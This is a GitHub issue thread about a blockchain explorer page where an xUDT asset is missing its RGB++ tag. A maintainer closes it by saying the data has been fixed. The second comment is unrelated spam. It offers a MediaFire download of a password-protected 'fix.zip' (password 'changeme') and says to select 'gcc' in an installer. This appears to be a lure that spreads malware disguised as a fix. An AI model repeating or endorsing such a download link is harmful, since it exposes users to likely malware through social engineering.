### ISSUE TITLE
Tag rgbpp is missing in some assets

### ISSUE THREAD

**Issue by Keith-CY** [Magickbase/ckb-explorer-public-issues#780]
**Describe the bug**
Visit https://pudge.explorer.nervos.org/xudt/0xeff08499fc05e18b6a3a6e3cd3dc84b6bac321cc1f451a11f95cf3e5043d1a69

Only `open source` tag can be found
<img width="908" alt="image" src="https://github.com/user-attachments/assets/620e123f-dbbb-40cc-8e89-ac0179701070">

Check its API and found the `xudt tags` is empty

<img width="198" alt="image" src="https://github.com/user-attachments/assets/da1e941b-8160-401c-ae4d-e61bf80f8129">

**Expected behavior**

It's expected to be an RGB++ asset because all xudts are considered RGB++ assets.
<img width="369" alt="image" src="https://github.com/user-attachments/assets/a59c0053-5b21-4307-bd7c-252f3147b013">

**Additional context**

This may be due to the previous tg rules change, where the tag was manually deleted, but the code to generate new tags was not run.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zmcNotafraid** [comment]
Data have fixed already.
